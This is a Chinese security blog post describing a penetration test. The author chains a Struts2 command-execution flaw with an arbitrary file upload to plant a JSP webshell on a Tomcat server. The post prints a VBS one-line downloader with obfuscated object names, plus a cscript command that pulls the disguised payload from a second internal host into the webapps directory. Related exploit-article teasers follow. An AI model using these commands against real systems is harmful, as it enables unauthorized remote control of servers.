漏洞组合又见getshell

作者: CSeroad | 来源:发表于2019-03-19 14:54 被阅读180次

前言

在项目中拿到一个比较有意思的shell。在此记录一下。

struts漏洞

拿眼一打,struts2框架。工具尝试扫描,果然存在漏洞。

image.png

但是确无法使用该工具的上传功能。猜测应该是权限不够导致的。

文件上传

在登录系统后发现一处文件上传。

image.png

测试发现可进行任意文件上传。上传jsp马试试

image.png

emmm。好像没有配置java环境,且不在同一台服务器。
尝试上传txt文本文件

image.png

访问一下。

image.png
确定是jsp马。
现在条件是:无法连接外网、有文件上传漏洞、命令执行漏洞。
怎么拿shell呢?
思路:利用命令执行powershell或vbs从192.168.40.13的服务器下载到192.168.40.21(不知为何powershell没有成功)

vbs一句话下载payload

1.echo命令输出创建downfile.vbs文件。注意转义

echo set a=createobject(^"adod^"+^"b.stream^"):set w=createobject(^"micro^"+^"soft.xmlhttp^"):w.open^"get^",wsh.arguments(0),0:w.send:a.type=1:a.open:a.write w.responsebody:a.savetofile wsh.arguments(1),2  >> downfile.vbs

2.downfile.vbs从192.168.40.13服务器下载文件到192.168.40.21服务器

cscript downfile.vbs http://192.168.40.13:9090/fileLibrary/5d5X9mSTZXjH9VlhXNN/x.txt D:\\tomcat8.5\\webapps\\x.jsp
image.png

下载的txt文件重命名为jsp一句话木马
ok!!!尝试访问

image.png

Nice!!!

image.png

相关文章

  • 漏洞组合又见getshell

    前言 在项目中拿到一个比较有意思的shell。在此记录一下。 struts漏洞 拿眼一打,struts2框架。工具...

  • CmsEasy 前台无限制getshell

    发布时间:2016-09-29公开时间:N/A漏洞类型:getshell危害等级:高漏洞编号:QTVA-2016-...

  • 2020-08-21通达OA V11.6-删除认证文件getsh

    相关漏洞简介:删除认证文件写入木马getshell 版本:tongdaV11.6 利用情况: 注意⚠️:此漏洞会删...

  • Fckeditor漏洞Getshell

    Fckeditor漏洞Getshell 测试之前 这是一个在朋友指导之下才成功的实战,慢慢的弄清具体原理。仅供学习...

  • 优秀文章

    简记siteserver远程模板下载Getshell漏洞 https://mp.weixin.qq.com/s?_...

  • tp5.0.7 修复getshell漏洞

    tp5.0.7 修复getshell漏洞[https://www.cnblogs.com/y734290209/p...

  • .NET Ueditor getshell

    Ueditor编辑器出漏洞了,.NET版本可以直接getshell... POC: shell addr填写she...

  • Tomcat manager getshell

    前言 趁热打铁,顺便复现一下通过Tomcat 的manager用户名、密码进行getshell 漏洞描述: Tom...

  • XXL-JOB漏洞getshell

    大佬分享的又一种getshell姿势 默认密码登录 任务管理--新增任务(按照下图填写)2.jpg 返回GLUE进...

  • Lampiao渗透实战

    在Lampiao渗透中,drupal 7的getshell漏洞值得深入学习,有机会自己可以复现,了解一下原理;该靶...

网友评论

    本文标题:漏洞组合又见getshell

    本文链接:https://www.haomeiwen.com/subject/oxfbmqtx.html